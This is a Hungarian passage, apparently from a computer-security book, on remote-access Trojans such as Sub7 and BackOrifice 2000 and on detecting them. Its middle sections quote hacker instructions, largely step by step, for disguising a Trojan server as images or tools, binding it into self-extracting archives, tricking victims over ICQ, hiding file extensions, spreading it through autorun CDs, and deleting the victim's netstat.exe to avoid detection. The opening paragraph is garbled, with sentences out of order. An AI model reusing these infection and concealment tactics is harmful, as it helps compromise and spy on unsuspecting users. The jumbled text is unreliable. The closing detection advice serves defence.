szerzik meg a hackerek az IP-t? A trójai használatához tehát szükség van a fertőzött számítógép IP-jére. tehát amikor fennáll a kapcsolat a fertőzött számítógéppel. milyen IP cím alatt. Mivel a legtöbb felhasználó szolgáltatón keresztül létesít internetkapcsolatot. A szerver futtatása általában két lépésből áll. És már meg is lehet fogni a klienssel egy fertőzött számítógép szerverét. majd telepítem és konfigurálni kell a szervert a rendszeren. a szerverfájl mindjárt el is indul. zel a kliens az idegen számítógép irányítócentruma lesz. mert nem lehet tudni. és vezérli a szervert Ha egy trójai távirányítási funkciókat kínál. válogatás nélkül címeket szkennelni. de nem leéli feltétlenül annak lennie. hogy a hackerek nem csak az ismert módokat. Hogy a kliens milyen funkciókat tud vezérelni. amellyel meghatározott IP-tartományokat lehet tapogatni. amelyeket a kliens el tud indítani. Egy programozó hozzáfért egy fejlesztői géphez. és a háttérben aktív legyen. így nem keletkeztek jelentősebb károk. megváltoztatta az Fpinget úgy.0 programkódjában.0 forráskódja volt. Már csak az kell. az a támadótól függ. Ehhez a legtöbb trójainak integrált szkenneré is van. amelyen a SÁTÁN 1. Ez a lépés többnyire az elhelyezéssel egybekötve történik. de kártékonyak is (adatok törlése) vagy kémkedők (adatok átadása). A szerver konfigurálásánál meg lehet határozni a klienshez küldés módjait és az akciós lehetőségeket is. mint a CD-ROM-meghajtó nyitása. és irányítani lehet azt. hogy maga a hacker is online legyen a megfelelő időben. automatikus értesítést adnak. DOS parancssor-ra váltunk. A komplex trójai programok. A legkönnyebben úgy lehet megkaparintani az aktuális IP-t. amellyel egy új felhasználót jegyzett be. A kapcsolat könnyen felismerhető 4.2 A kliens otthon marad. minden kapcsolódásnál egy másik. ha a fertőzött számítógép a hálózatra. mint pl. és ott beírjuk: netstat . Hogy hogyan használja ki ezt a veszélyes potenciált. amelyeket később még bemutatunk. illetve az internetre lép. Ezután igen könnyű kiolvasni remote címekből a trójai szerver IP-jét. választják. A trójaik lehetnek programba integrálva vagy fájlokhoz fűzve (erről később többet). Ez az eset is mutatja. Ezzel a programmal tud akciókat kiváltani a szerverrel a számítógépek között fennálló kapcsolaton keresztül. Először is aktiválni. 4. az e-mail mellékleteket. Amint a fertőzött számítógép kapcsolatba lép a hálózat- . módosította a main()-funkcókat. Ha a szerver automatikus értesítésre van beállítva. Ez így nagyon egyszerűen hangzik. és ha igen.2.n. és megkapja a támadáshoz szükséges IP-címet.Az elhelyezésre a hackereknek és az ilyen eszközök programozóinak is rengeteg ötletük van. aki ezzel elérést kapott. Az egyik legismertebb eset egy trójai elrejtése a Linux SÁTÁN 1. hogy a fertőzött számítógép egyáltalán online-ban van-e.

illetve az internettel. vagy mail-ben küldi el az aktuális IP-t. Ezután a melt server after installation szerver opció segít. pl. A következőkben nemcsak az egyszerű álcázásokkal ismerkedünk meg. ha hiányoznak a programozási ismereteik. hanem a hobby-hackerek eljárásaiba is betekintünk. mint például a Sub7-nek. Ezek arra valók. Tedd fel hasznos programként a honlapodra. A veszélyes kis programok terjesztésére a legkülönbözőbb lehetőségeket agyalták ki a programozók. Ezeket mindenki szívesen küldi és nézegeti. hogy könnyen és gyorsan tudják terjeszteni. 4. hogy trójait rejtettél bele.3. vagy be lehet építeni segédprogramokba. ICQ-n vagy IRC-n keresztül küldjük. PC-felhasználóként mindenesetre ismernünk kell ezeket. amelybe a szervert ágyazzák. A trójaiak minden esetben veszélyesek. hogy az áldozat nem fogja gyanúsnak találni vagy rossz szándékot feltételezni arról a programról vagy a képről.2 Álcázás a WinZip-pel A trójai ügyes elhelyezéséhez a világ leggyakrabban használt tömörítő programjának. azt persze nem kell elmondani. 4. egy Defcon4 nevű hackercsoport (csak csekély mértékben módosított) szövegét fogjuk használni. Egyes trójai kiteknek. Képnek álcázzuk (valami nem gyereknek való mindig jól jön) vagy toolnak. hogy az áldozat mit kíván. Ez akkor célszerű. Hogy egy pillantást vethessünk a dolgok menetére. olyan funkcióik vannak speciális konfigurációs fájlokban (Editserver). Ehhez minden ikon felhasználható. amint az áldozat online van. A szerver fájlokhoz fűzése a következő előnnyel jár: ki lehet indulni abból. Ikon-kiosztás a szervernek Olyan programnak.GiF.3 így álcázzák és terjesztik a trójaiakat Ehhez a hálón nagyon sok program áll rendelkezésre." 4. A stratégiák egy része valóban profinak is mondható. aki a szervert vezérli. A hobby-hackerek. tehát képekkel. különösen alkalmasak az animációk és a gag-programok. hogy kínálja a honlapján. Ilyenkor egy új WinZip archívot készítenek. így a vélt DOC fájlok egy megnyugtató Winword ikont tudnak prezentálni. A run command after unzipping parancs az archívból történő kicsomagolás után azonnal elindítja a szervert. a szerver átküldi az aktuális IP-t a kliensnek. amennyiben az éppen online van. a WinZip-nek a programbeállításait is használják egyes hackerek. JPG.) együtt csomagolják össze a szervert. amelyeket a programok egyébként is használnak: a képek JPEG fájlként megtévesztőén hasonlítanak az eredetire. tehát EXE fájlokba. míg mások inkább csak a hobby-hackerek eszközei közé sorolhatók. az IP-t.tál. „A szervert mail-ekén. amelyekkel a legkülönbözőbb fájlokkal lehet öszszekötni a konfigurált szervert.1 A trójaiakat fájlokba integrálják A szervert össze lehet kötni különböző fájlokkal. mert annak a szándékait uralják. Erről az internet idevágó fórumain olyan rengeteg információ gyűlt össze. sőt még a szerver ikonját is meg lehet változtatni. és más fájlokkal (képek stb. Ha már így elterjeszted a szervert a nép körében. A profik például más programokba integrálják a trójaiakat. és mail-ben vagy ICQ-n keresztül üzenetet küldjenek neked. hogy bekösd a szervert. így tud a hacker célzottan rajtaütni a fertőzött számítógépen. . amelybe a szerver be van ágyazva. Az archív ártalmatlan önkicsomagoló fájllá változik. ha az áldozatot valóban meg akarjuk téveszteni egy fájllal. mert ez a sikeres telepítés után azonnal törli a szervert. attól függően. pl. vagy kérj meg egy baráti webmestert. hogy abból már igazi „gyűjtemény" áll össze. inkább más utakat választanak. ha megfelelő értesítőfunkciókkal rendelkező trójait használsz. hogy értesítsenek. és máris van egy tökéletesen álcázott trójai. . amire szükséged van. amelyben bizonyos információkat kapsz az áldozatról és számítógépéről. akkor nem rossz.3.

ha generálunk egy új ICQ-UIN-t (a MICQ-val többel is online lehetünk egyszerre). anélkül. hiszen a kontaktlistát a beleegyezése nélkül bővítették. Férfi áldozatokhoz általában a női identitás az ideális.inf szövege.4. ez a trójai túl kicsi ahhoz.3. amelyen át más fájlokat lehet feltölteni és végrehajtani. Tehát akinek van egy kis tapasztalata. megnyílik egy hátsó kapu. Ezek az alábbiak lennének: • A Sub7 trójai (magyarázat 1. hogy elfogadja a fájlt. Amint ez a fájl az áldozat gépén egyszer lefutott. Ezen kívül az infóban minden személy IP-jét megmutatja. A hacker ráér A szervert általában nem az első kapcsolatfelvételnél küldjük el az ICQ-n keresztül. Az áldozatot persze nem kényszerítjük. Álcázás az ICQ-val Ha lehet. „Ha az áldozat tényleg gyanítja. még mindig el lehet neki küldeni egy pár nappal később egy anonim mail-fiókról. mint egy nagyobb kép). Ekkor reális az esélye annak. Ha egy fájlt photo. lent) • MICQ (többször elindítja az ICQ-t) • ICQ-AutoAuthorize/IP-Unhider Patch • The Thing (kis trójai) A MICQ egy program. az könnyen kiszámolhatja magának.3 A trójaiakat az ICQ-val is tovább lehet adni Ön is kedveli ezt a kényelmes kommunikációs szolgáltatást az interneten? Van már egy listája kedvelt „beszélgetőpartnereiről"? Akkor valószínűleg érdekelni fogják azok a lehetőségek. Egy pár nap múlva azután már sokkal kisebb feltűnést kelt bármilyen állomány.4 Elég egy CD és az automatikus lejátszás funkció A trójai kihelyezésének egyik kedvelt módja a CD-n keresztüli terjesztés. amilyen például a The Thing. egyszerűen várni kell pár napot. álcázzuk a saját identitásunkat. Ezzel egyidejűleg lehet online két vagy több UIN. amire szükségünk lesz. hogy a másiknak ehhez engedélyt kellene adnia.inf fájlt. a régebbi ICQ-verziók egy kis búgját is kihasználhatjuk: ezek általában nem mutatják meg a fájlvégződéseket. mint hacker meg hasonlók garantáltan nem fordulnak elő. Egy Autorun. amelyben olyan fogalmak. Ha a fájl küldéséhez az ICQ-t használjuk.jpg jelenik meg. amely lehetővé teszi az ICQ több példányának a párhuzamos indítását. hogy egy fájl mögött vírus vagy trójai rejtőzik. akkor is. valamit fecsegni. Megkeressük az áldozatot a trójai terjesztéséhez.jpg. átvitelkor csak a photo. A legtöbb trójai a sok szolgáltatás miatt már eleve akár 400 Kbájt is lehet. A legjobb." 4. hogy feltűnjön.exe nek nevezünk el. A CD-ROM-on megváltoztatja az Autorun. ha kezdetnek elküldünk egy pár tiszta fájlt. Mint már mondtuk. amely egy trójaira utal . és aztán egy nagyon kicsi fájllal megpróbálkozni. és ez nem különösebben feltűnő. A The Thing ezzel szemben csak kb. akkor amilyen jól csak lehet. ha ez a funkció nálunk nincs aktiválva (az IP-ről és kiosztásáról lásd az alapismeretekről szóló fejezetet). Nos. hogy mi rejtőzik egy ilyen fájl mögött. Sokkal jobb. A The Thing egy kis trójai. Az ICQ Auto-Authorize/IP-Unhider-Patch megengedi UIN-ek hozzáfűzését a saját kontaktlistához. Ha a fájlt visszautasítja az ICQ-n keresztül. Ehhez egy program vagy egy játék kalózmásolatát használja a hacker. és hozzáfűzzük a kontaktlistához. hogy az áldozat észreveszi a támadást. ez így megy (megint a Defcon4 „információi" szerint): Először begyűjtünk minden eszközt. amelyek az ICQ-nak köszönhetően adódnak a hackereknek. Ezt többnyire a közeli környezetben található célok megtámadásához választják. 40 Kbájt (nagyjából annyi. Ilyen eset- ben már csak ártatlan kifogások segítenek.3.

MPEG fájlt). Ha ezt a lemezt most megkapja a felhasználó. hogy észrevehető lenne. és elindítja a Film. Ebben a mappában létrehoz még két további mappát. A terjesztés CD-n keresztül is inkább a hobby-hackereknek való. 4.7 Mit csinálnak a hobby-hackerek a trójaiakkal? A kérdés az első hallásra figyelemreméltóan hangzik. Ez egy CD-ROM felismerése után azonnal kiértékeli a megfelelő Autorun. és a szerver automatikusan elindul a játék bevezetőjével együtt. és ekkor a következőképpen működik.) válik igazán vonzóvá. de ha belegondolunk.3. Ezzel szemben egy letöltésre kínált anyagot először fáradságosán ismertté kell tenni. a trójai is elindul. amelyek úgy szaporodnak. milyen stratégiákkal tudja egy hacker célzottan megközelíteni az áldozatát.a Kurnyikova-vírus jó példa a sikert ígérő környezetekre. Ez utóbbinál nem kell célzott támadásokkal és hasonlókkal bajlódnia a hackernek. mert az ilyen tömeges fertőzések mind a tervezés. feltört program stb.AVI vagy *. mert nem minden trójai kínál valóban érdekes adatokat a hackereknek. és Film. Most az editorral készít egy batch-fájlt (kötegelt parancsfájlt) a lemez főkönyvtárában. Ebben a két esetben más késztetések vannak a háttérben. mint a rombolás. az egyik neve mondjuk Film Data. A batch-fájl elindítja a szervert anonimitása védi a tettest. alkalmasabbak a vírusok. de ha csupán a nagy mértékű pusztítás a cél. 4. a másiké Xxdata. A talán legfontosabb és legsikeresebb eljárás a letöltésre kínált anyagokkal és a vírusokkal való terjesztés.bat-ot. Az adatok azonnali tönkretétele inkább személyes ellenségeskedésből fakad. hanem egyszerűen az időfaktorra (dátumvezérlés) vagy a használati gyakoriságra (a rombolás x fájlindítás után indul) épít. Természetesen egy trójaival jelentős károkat lehet okozni. és erre. amelynek például Film a neve. de technikailag nem elég képzett ahhoz. az internet-kapcsolat . hogy célzottan jelszavakat vagy hasonlókat kutasson ki. A Film Data mappába másolja a tulajdonképpeni filmet (*. anélkül. hogy a user előtt ne jelenjen meg a futtatás DOS-ablakban.Az alapelv a következő: a felhasználó beteszi a CD-ROM-ot a meghajtójába. És mostanra már tudják. 4. és támadhatóvá teszi az áldozatot. Addig pedig a terv még csődöt is mondhat. hogy a levelezési címlisták minden címére elküldik magukat. A hacker létrehoz egy mappát a lemezen. Ehhez a Windows 9. Az olcsó szörfözésre utaló jelszavak viszonylag érdektelenek.inf fájl adatait és végrehajtja a fájlt. Emellett természetesen terjesztési stratégiát is kell fejleszteni. Persze azért ez a motívum sem zárható ki. Az @echo parancs szolgál arra. Esetünkben tehát a szervert is.3. amelyek magas rákattintási és ezzel installálási arányt garantálnak. mert a hordozó csak a tartalma révén (játék. amely lehetővé teszi az elhelyezést világszerte több ezernyi számítógépen. a másik Xxdata mappába másolja a szervert. mielőtt a megfelelő számú kihelyezés megtörténhetne. Ez a legegyszerűbben férgekkel (warm) érhető el. mind a kiértékelés/felhasználás szempontjából sokkal ráfordítás-igényesebbek.3. Egy trójait gyorsan nagy számban elhelyezni nemcsak ideális álcázást kíván . A trójai tulajdonképpen minden esetben olyan támadási technikát jelent. egy vírus végülis sokkal sikeresebb.x automatikus lejátszás funkcióját használja ki a hacker.bat néven menti. Egy nagy számban kihelyezett trójaiból beérkező adatokat természetesen ki is kell értékelni. amelynél fontosabb a hozzáférés. a legtöbb ember ugyan kíváncsi. Fontosabbak a hálózati hozzáférési jelszavak stb. mint azt majd a következő fejezet mutatja.5 A lemezek majdnem ugyanígy működnek Ez az alapelv a lemezekre is átvihető.6 További terjesztési stratégiák A trójaiak terjesztésének különböző stratégiái immár világossá váltak. A közvetlen kapcsolatok az ICQ-n keresztül elsősorban a közelebbi és a távolabbi ismerősök területén könnyítik meg a terjesztést.

. akkor egyszerűen kliensként összeköttetésbe lép saját magával (a saját gép IP-je mindig 127. Először túrd át pár napig az áldozat gépét. megváltoztathatnád a startlapját. az interneten található „szabályokból" is láthatjuk. Amint hozzáférünk az áldozat adataihoz. tulajdonképpen nem is tudják. Mindannyian tudjuk. fogja. amit a gép tulajdonosa is megtehet. egy backdoor-trójai. 4. Ez azt jelenti. nem?" Önfertőzés ügyetleneknek Azoknak a hobby-hackereknek. és nézd meg az összes adatát.01!).A legtöbben azonban. Ismert remote access program pl. Én személy szerint teljes mértékben az adatmegsemmisítés ellen vagyok. 1999 márciusában került a hálóra az első verziókban. a következő tanácsot tartja készenlétben az internet: „Ha az ember az első fertőzési kísérleteknél saját magát fertőzi meg. Az egyes funkciók későbbiekben történő említése bizonyosan hozzá fog járulni az ilyen szoftverből eredő potenciális veszélyek felméréséhez. Áthelyezhetnél fájlokat. „Ha sok fantáziával és több ICQ-UIN-nal végre sikerült egy trójait elültetnünk az áldozat számítógépén.exe-t.1 Támad a Sub7 A Sub7 tágabb értelemben egyfajta távkarbantartó programhoz hasonlítható. és törli a szervert!" Pillanatkép egy trójairól 4. a PCAnywher a Symantectől. akik csak úgy kísérletezgetnek egy kicsit ezzel.0. Legyetek szívesek. A Sub7 a legkomolyabb és a neten legelterjedtebb trójaiak közé tartozik.4. akik kísérletezés közben saját magukat fertőzik meg trójaival. hogy az már nem túl vidám dolog.azért ez förtelmes lenne. Hogy világszerte milyen sok rendszer volt Sub7-tel fertőzött. \windows\netstat. illetve hogy még most is az. hogy a megfelelő kliens tulajdonosa minden olyan funkciót végrehajthat a fertőzött gépen. amelyek egymáshoz kapcsolódva gondoskodnak a támadó gép és a fertőzött gép kapcsolatáról. egy ilyen szoftverrel a teljes ellenőrzést át lehet venni egy fertőzött számítógép felett. amint azt a következő. A távkarbantartó szoftver.egy trójai rémisztő lehetőségekkel A Sub7. elsőként töröljük a C. Azóta ez a backdoor-tool folyamatosan tökéletesedik és új funkciókkal bővül. nem kell mindjárt nekikezdeni a mulatságnak. azt az úgynevezett portszkennek mutatják.. Egy olyan trójai. több fájlból áll. a rendszergazdák távkarbantartó és konfigurációs munkáját könnyíti meg a hálózatba kötött számítógépeken. hogy valójában mit is akarnak kezdeni az áldozat gépén. azaz a remote access tool vagy remote administration tool. nagyobb hálózatokban. Destruktív módon felhasználva.4 Sub7 . ha fontos adatokat veszítünk el. információkat fűzhetnél dokumentumokhoz. ne nagyon bántsátok az áldozat adatait. és tovább tanulmányozhatnád a trójai sok funkcióját. mint a Sub7. egy Mobman álnéven működő programozó „válaszaként" a NetBusra és a BackOrifice-vz. amelyek „több mint elég" fertőzött rendszert jelentenek. Általában kíváncsiság és egy adag vandalizmus rejtőzik a háttérben. . Ezzel a Windows programmal viszont minden hálózati kapcsolatot meg lehet nézni.

amelyről a trójai kommunikál (az újabb verziókban véletlenszerű is lehet . A Sub7-nek kapcsolata van a szerverre! így előkészítve sokféleképpen közelíti meg a támadó az áldozatát. Ennek a modulnak tehát feltétlenül telepítve kell lennie az irányítandó rendszerre ahhoz. hogy miként telepítse magát a célgépre a szerver. A CDC ezzel a verzióval „trójainak" kikiáltott programjának a hírén akart javítani. menükkel és kiválasztómezőkkel. Pillantás a Sub7 váltóközpontjára Minden működést a kliens irányít A kliensre azért van szükség. így például a magasfokú titkosítással. amellyel a szervert lehet konfigurálni. és irányítsa a fertőzött gépet.5 BackOrifice 2K . Egy ügyesen programozott kliens/szerver alkalmazásról volt szó. Ehhez jönnek egyes ICQ-beállítások (értesítés. . és új képességekkel bővítette. Különösen ennek kellett a BO2K-t érdekessé tenni a hálózati rendszergazdák számára. grafikus felülettel.A Sub7 szervere A szerver ahhoz szükséges. hogy a szerver közvetlenül a telepítés után azonnal elinduljon-e. és hogy a felhasznált port rejtve legyen-e. hogy a műveleti konzolok (kliens) között kapcsolatot teremtsen. amelyekről egészen kényelmesen el lehet indítani az egyes funkciókat. bár azt nem ismerték el. hogy Sub7-es fertőzöttségről lehessen beszélni. és megkísérli a célrendszerre telepíteni a szervert. amely csaknem lehetetlenné teszi.állította a hackercsoport . Ugyanezen év augusztus 7-ig a programot több mint 35 ezerszer töltötték le a CDC honlapjáról. a port. Edit-Server Az Edit-Server egy kiegészítő program. és ezzel irányítóközpontként működhessen. mert a BackOrifice ezután is az egyik legkedveltebb trójai maradt. 4. hogy a trójai egyes funkcióit inicializálja. A 2000-ben a Cult of the Dead Cow (CDC) kihozta a BackOrifice új verzióját: a BO2K-t. továbbá itt lehet meghatározni a szerver nevét is. UIM-kicsomagolás). Las Vegasban. hogy Windows 9x alatt biztonsági problémák lennének. Azt is meg lehet adni.Hálózati eszköz vagy támadás a Microsoft ellen 1998. augusztus elején mutatta be a texasi Cult of the Dead Cow hackercsoport a BackOrifice Windows Remote Administration Tool-t egy hackertalálkozón. A Microsoft válasza nem váratott magára sokáig. A hackereket azonban ezek a dolgok nem nagyon érdekelhették. A BackOrifice célja . Itt lehet például rögzíteni. gombokkal. A klienst teljesen hagyományos Windows-programként kell elképzelni.itt a port a futási időben derül ki). hogy az a szervert az installáció előtt elrejtse. És ehhez a program nem a Windows operációs rendszer valamiféle búgjait vagy belső dokumentálatlan API-jeit használja. hanem kizárólag dokumentált Windows funkcióhívásokat. hogy az átvitt adatok egy harmadikhoz kerüljenek. és hogy egy másik futtatható fájlhoz kapcsolódjon-e.a Windows 95/98 alatti súlyos biztonsági hiányosságok feltárása. jelszókikémlelés. amely trójai falóként észrevétlenül tudott futni egy Windows 9x operációs rendszeren.

hogy az adatok kódoltan közlekedjenek a kliens és a szerver között. Ez a plugin az első pillantásra ugyan nem nyújt új lehetőségeket. A szervert kiegészítő részekkel (pluginek) még bővíteni lehet.dll Funkció Lényegében ezek a szerver alapfunkciói. nem vagyunk-e már magunk is fertőzöttek.5. hogy a rendszer használhatatlanná válik . Ha a vírusvizsgáló fertőzést talál.és trójai-szkenner Alapvetően minden rendszerben mindig kell telepített vírusvizsgálónak lennie. hiszen szinte naponta fedeznek fel új trójaiakat.6 így ismerjük fel a trójait a rendszerünkben Most. Ha a vírusvizsgáló nem talál fertőzött fájlokat. de ez kódolja a TCP-csomagok headerét.dll enc_serpent. és ez a vírusvizsgálónak jelentős problémákat okozhat. . a gép már megfertőződött.1 A BO2K és összetevői íme egy áttekintés a legfontosabb fájlokról és funkcióikról a távkarbantartási funkciók és a trójai működés komplex együttműködésében. a szerver neve. mivel az ilyen programok keresése gyakran beavatkozásokat igényel a rendszerbe. A trójaiak leküzdésének most következő módjánál nagyon óvatosnak kell lennünk. Fájlok és funkcióik együttműködése 4. hogy különösebb ismeretekre lenne szükség róla. és kisebb bővítéseket (pluginek) hozzáfűzni. felmerül a kérdés. Először . illetve karanténba tenni. hogy ez állandóan aktualizálva legyen. Fájl bo2k.dll B02K pluginek Ez a plugin látja el az értesítési funkciókat: ha a szerver elindult. A trójai rejtőzködhet . Ez a plugin gondoskodik arról. hogy a Minden fájl ellenőrzése vagy hasonló funkció aktív legyen. amelyek jelentősen megkönnyítik a standard trójaiak felkutatását. amelyen a szerver és a kliens összekapcsolódnak.és megtévesztheti a víruskeresőt.6. Mielőtt a kliens a szerverrel kapcsolatba tudna lépni.exe szekötéséhez. A grafikus felhasználói felületen keresztül lehet a fertőzött PC-t távirányítani.4.exe Funkció Ez a szerver. bo2kgui. Mobman például beépített egy ilyen funkciót a Sub7-be. Ezt a gyártók gyakran nem állítják be előzetesen. az még messze nem jelenti azt. amelyen a rendszerkönyvtárba másolódik stb. A Registry-be is bejegyzi magát úgy. Ha a szerver csak egyszer is elindul. Próbáljuk meg a fájlokat izolálni. azt a következő szakasz részletezi. inkább kérjünk tanácsot szakembertől. Ha elindul.). automatikusan a C:\Windows\System könyvtárba másolja magát. A gyakorlatlan felhasználónak ez nehéznek tűnhet. így ezeket nem lehet BO2Kadatforgalomként (Traffic) felismerni. mert a szkennelés így túl sokáig tarthat.mint mondtuk . hogy fájlokat lehessen kicserélni. hogy minden Windows-indításkor automatikusan aktiválódjon. Ezért szeretnék itt néhány lehetőséget bemutatni. hogy a szkenner ne törölje azonnal a fertőzött fájlokat. a Rattler mailben elküldi az áldozat IP-jét. Sőt bizonyos esetekben még ahhoz is vezethet. hogy a trójai falovak bevetésének a lehetőségei és potenciális veszélyei ismertté váltak. hogy a számítógép tiszta. Továbbá feltétlenül szükséges. hogyan lehet felismerni és leküzdeni egy rendszerben a trójai vírusokat. anélkül. Az első vizsgálat előtt figyeljünk arra.vagy jobban mondva: a gép totál lefagy. illetve a Registry-be. a megtisztítás különböző lehetőségeit fogja javasolni. A SERPENT feladata.) végezni a szerveren. hogy elkerüljük az esetleges károkat. néhány dolgot még be kell állítani rajta (jelszó stb.dll io_stcpio. srv_rattler. Arra is figyelnünk kell. Hogy az ilyen esetekben mit tehetünk.exe A kliens a BO2K „látható" része. 4. Ha nem vagyunk biztosak magunkban. A BO2K legfontosabb fájljaihoz jön még néhány plugin: Fájl bo2k_inetcmd. port.tekintsünk el az érintett fájlok törlésétől. Vannak azonban olyan programok. mert egyes trójaiak szerzői biztonsági intézkedéseket építettek a programjaikba az eltávolításnak e módja ellen. Ezzel a programmal lehet fontos beállításokat (kódolás.1 Vírus. Az IP (ez a címe egy PC-nek az interneten) is szükséges a kliens és a szerver öszbo2kcfg.

2 AutoRun bejegyzések Egy trójai csak akkor működik.de ez is nagyon ritka. Ezzel a programmal a fent nevezett bejegyzések közül sokat ellenőrizhetünk. a mappát a felhasználói profilokon keresztül lehet megtalálni (C:\WinNT\Profiles\ Username \Startmenü\Programok \Indítópult).ini . amelyeket nem ismerünk. Gördítsük az alsó gördítősávot egyszerűen jobbra. Az indulásnak ezt a lehetőségét a rendszerindítással együtt sok ártalmatlan program (pl. illetve parancsikonokat kell törölni. Ez azt jelenti.DOS-os hulladék. mint a Windows NT. Ez az indítási lehetőség azonban nagyon valószínűtlen. backup programok stb. Eddig alig ismertek olyan trójaiak.ini . Hasznos segítség a Windows saját msconfig programja is. A System. mert nagyon nagy a felfedezés valószínűsége. hát megemlítjük.exe után azonban még további bejegyzések következhetnek. Itt megintcsak ajánlatos az óvatosság. míg a sor végét is látjuk. hogy ne legyenek rögtön láthatóak. ezt semmiképpen se töröljük! Az Explorer.bat . autoexec. config. és kényelmesen megváltoztathatunk.kevésbé valószínű Klasszikus változat az automatikusan indítandó programok indítására az autostart (Indítópult)-mappa. amelyet az utolsó rendszerindítás előtt töröltek. hogy a szervernek a rendszer hátterében állandóan futnia kell. Az autoexec.bat-ot is a sysedit. A Win. ez rendszerint azt jelenti: egy parancssor egy fájl másolását írja elő. mert ide is bejegyzi magát néhány ártalmatlan program. de a trójaiak is.ez már izgalmas A regisztrációs adatbázisban megnevezett útvonalak mappákként jelennek meg. vírusvizsgálók. írjuk be a Start/Futtatásba a sysedit. De persze a parancsokat többnyire rengeteg üres karakterrel álcázzák a paraméter-megnevezések mögött. Nézzük meg a Load és a Run paraméterek mögötti bejegyzéseket. és esetleg programokat.sys . amelyek ezt az utat használnák. Ezeket a trójaiakat azonban nehéz realizálni. Számos más Registry-bejegyzési lehetőség is előfordul autorun célból. A control.sys szintén a sysedit. ha a rendszerindítással együtt elindul. Menjünk egyszerűen a Start gombra.exe-t.ini bejegyzésein keresztül indítani a trójaiakat. A sysedit-tel is sokat megtalálhatunk a fentiek közül. és írjuk be msconfig. hogy online kapcsolat esetén kész legyen parancsokat fogadni a klienstől.6. és szerencsére nagyon ritkák is.6. Az olyan rendszereknél.4. Több ablak is megnyílik szövegszerkesztő formában.ini a Windows 3.csak a szokatlan eszközmeghajtók veszélyesek Néhány ritka trójai a Windows 95/98-s rendszerek eszköz-meghajtójaként is álcázza magát. Autostart (Indítópult)-mappa . A config. 4.bat vagy control. Hogy ezt kizárjuk.exe-vel lelhető fel. mielőtt bármit is törölnénk. System.) is használja.ini-ben is el lehet helyezni egy bejegyzést az automatikus indítás céljából. mint a Win. helyette azonban ezt írjuk be: sysedit.exe nevű bejegyzés.ini-t ugyanúgy nyitjuk meg szerkesztésre. Az Indítópultot a következőképpen lehet ellenőrizni: közvetlenül a Start menüből: Start Programok Indítópult vagy C:\Windows\Startmenu\ProgramokMndítópult.elég ritka Ebben a fájlban a shell= paraméter alatt fordulhat elő bejegyzés. aztán a Futtatás-ra. Járjunk el úgy. mint az msconfig-nál. Óvatosan! Itt már van egy Explorer. winstart.exe-vel lehet megnézni és szerkeszteni.3 Windows Registry .bat-ban felismerhető egy bejegyzés. és egy trójait indíthatnának el. Mivel azonban ez a lehetőség is adott. de persze ezeket (szerencsére) csak ritkán használják a trójaiak. A trójaiak ritkán használják ezt a lehetőséget. Itt aztán szokatlan dolgok után kell kutatni. uninstallprogramok. az illető ikonra duplán kattintva érjük el őket. Szükség esetén távolítsuk el a gyanús bejegyzéseket. kis rizikófaktorral Itt is óvatosnak kell lenni a törléssel.ini-t.x-es időkben volt érdekes Régebben nagyon kedvelt módszer volt a Win. .lehetséges. de nagyon ritka Ha a winstart.

Ilyen esetben nem egyszerű a pontos azonosítás.Következőként hívjuk meg a Rendszerleíró adatbázis-szerkesztőt a Start/Futtatás/Regedit-tel. Rendszerint azonban csak az itt megnevezett bejegyzések vannak. Itt is egy Registry-be került bejegyzést keresünk. azonban egy „szokatlan" path-on: . amögött egy trójai rejtőzhet. eszközmeghajtónak is álcázhatja magát. Eszközmeghajtónak álcázás Egy trójai. Ezek közül csak néhány útvonal érdekes: A „%1" %*" karakterek elé be lehetne írni még egy programot. Itt is a Windows Registryt használják a program automatikus indításához. Végülis lehet az egy valódi meghajtó is. Megnyílik egy program félelmetesen sok bejegyzéssel. Ha valamelyik kulcs még egy futtatható fájlt is tartalmaz. hanem csak a program nevét! ICQ-usereknél fennáll egy további lehetőség a következő bejegyzésnél: Registry Installed Components Vannak még az úgynevezett „Unknown-módszerek". illetve a Windows-regisztráció. a shell paraméterrel. Ezek alatt az útvonalak alatt a következő bejegyzések találhatók: Registry Common Startup kulcs A bejegyzés általában Ez alatt az útvonal alatt található a szerver is. aminek a törlése rendszerproblémákat okoz. Gyanú esetén ne az egész bejegyzést távolítsuk el. mint már említettük.

Megjelenik egy ablak. amelynek más a mérete. amely mutatja a futó programokat.exe (C:\windows\) elindulna. ami a Windows alatt adódik. Menjünk a Nézet menüpontra. hogy legközelebb egy trójai töltődik be. Az eredeti runonce. mert tényleg mindent könyörtelenül megmutat.exet futtatja le (kétséges esetben a C:\ könyvtárban). LEHET! Ennek a módszernek a további magyarázatához az angolul értők olvassák el a Schoolbus 2. „Futó folyamatok ellenőrzése" módszer Gyakran lepleződik le egy trójai úgy. amelyek a rendszerrel „együtt futnak". A Windows 2000-be is integráltak egy nagyon jó folyamat-nézőkét. 4. amely a C:\windows\system könyvtárban vagy máshol található. Windows 98/ME alatt pedig 40960 bájt.4 Módszerek az Explorer. Ezeket különböző módokon lehet megfigyelni. Tehát ha találunk egy runonce. Ez a módszer azonban egyáltalán nem biztos.exe-t.exe-t egy módosított fájlra cseréli. hogy kell elrejtőzni a Taskmanager elől. amelyet a Taskmanager-rel együtt lehet elindítani.exe mérete a Windows 95 alatt 11264 bájt. Hangsúlyozzuk. mert a legtöbb trójai „tudja".6. Itt futtatható fájlokról van szó. amelyeket ennek megfelelően be is lehet zárni. A Windows-zal azonban egy jó kis eszközt is kapunk a futó folyamatok ellenőrzéséhez. A program elindul.0 trójai leírását. Az explorer.5 A runonce.exe-vel a C:\ meghajtóra Egy bug miatt a Windows először mindig az első. . hogy a „futó feladatokat" ellenőrizzük. és válasszuk a Mindent megmutat opciót.8m.6. amely így lehetővé tesz egy autorun eljárást.exe kicserélése Csak a Schoolbm trójainál ismert. A program neve: DrWatson. amely a http://serdarka. akkor itt is el lehet rejtve egy trójai. A Start menü Futtatás-ba írjuk be: drwatson. mielőtt a tulajdonképpeni explorer.com/ weboldalon található. és először elvégez néhány vizsgálatot. Kezdőknek azonban a DrWatson bonyolultnak tűnhet. Például a Ctrl+Alt+Del billentyűkkel. Az eredeti Windows runonce.4. megtalált explorer.exe a C:\ -n azt eredményezhetné.

